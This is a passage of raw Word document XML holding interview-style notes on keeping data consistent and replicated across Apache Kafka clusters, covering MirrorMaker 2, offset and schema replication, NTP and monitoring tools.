          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848013C" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Helps avoid schema mismatches and consumption issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D642BCB" w14:textId="77777777" w:rsidR="00DF5B7A"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5027C76">
          <v:rect id="_x0000_i3317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0F226" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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6. Time Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548668C1" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Ensure all Kafka brokers across clusters use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Network Time Protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DA2DB" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Prevents issues in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp-based message ordering or retention policies</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD2E5F" w14:textId="77777777" w:rsidR="00DF5B7A"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B6D98AE">
          <v:rect id="_x0000_i3318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048DE7B" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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7. Schema Registry Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C0B25" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent’s Multi-Region Schema Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or replicate schemas manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35946B06" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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nsures producers and consumers in both clusters interpret message formats identically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAA431" w14:textId="77777777" w:rsidR="00DF5B7A"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6870E92">
          <v:rect id="_x0000_i3319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9AB90" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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8. Handle Consumer Offset Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097A342" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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MM2 replicates offsets using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>__consumer_offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> translation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545EDCD6" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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This helps consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume from the same position</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the target cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AF0FB" w14:textId="77777777" w:rsidR="00DF5B7A"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646DC31">
          <v:rect id="_x0000_i3320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BC06D" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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9. Fault Tolerance with Quorum-Based Replication (KRaft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1D703" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Kafka’s KRaft mode (removes Zookeeper) has built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70025784" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Offers better consistency guarantees in multi-node/multi-region clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E46375" w14:textId="77777777" w:rsidR="00DF5B7A"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77A2608">
          <v:rect id="_x0000_i3321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C846C2" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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10. Data Validation Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F76B6" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Use tools like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A1616" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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ruise Control</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for replication monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E0808" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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Burrow</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for consumer lag and offset validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73070407" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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ustom checksum verification for message-level integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F327AC0" w14:textId="77777777" w:rsidR="00DF5B7A"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411DFC5">
          <v:rect id="_x0000_i3322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BFB7A" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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89"/>
        <w:gridCol w:w="3803"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="790E9013" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="410B6E88" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9C30F1" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3715324F" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA12ED" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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irrorMaker 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0374E8D7" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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opic &amp; offset replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="41A15210" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4337CF00" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Idempotent Producer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0D05B8" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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revent duplicate messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="22D65F2C" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D61111" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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xactly-Once Semantics (EOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0359B08A" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Guarantee message delivery accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5CA76859" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150DE7F0" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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chema Registry replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5187AA91" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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nsure message format compatibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="70C79C6F" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5AF8D9" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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Offset replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4609607E" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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eamless consumer failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3E573FC5" w14:textId="77777777" w:rsidTr="00DF5B7A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C94649" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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nsistent configs + NTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289A3104" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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revent logical inconsistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58B397C4" w14:textId="590E8E48" w:rsidR="007C61B8" w:rsidRPr="00CE4B95"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6AEC9CE">
          <v:rect id="_x0000_i3323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD22CD7" w14:textId="7B8280FE" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00F04107" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="823" w:name="_Toc196308303"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss strategies for ensuring data consistency and replication across Kafka clusters, such as cross-data-center replication and the use of Kafka MirrorMaker</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="823"/>
    </w:p>
    <w:p w14:paraId="3D00A608" w14:textId="557E012D" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data consistency and replication across Kafka clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-datacenter (multi-region)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> setups, is crucial for fault tolerance, disaster recovery, and low-latency access. Here are the key </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strategies and best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure reliable data replication and consistency across Kafka clusters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE5280" w14:textId="77777777" w:rsidR="00F22E41"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B3B7710">
          <v:rect id="_x0000_i3324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFF149" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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1. Kafka MirrorMaker / MirrorMaker 2 (MM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53384FDD" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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MirrorMaker 2 (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CC307" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Built on </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2B30B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active-active</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active-passive</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B7C20" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Automatically replicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2583E8" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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opics</w:t>
      </w:r>
    </w:p>
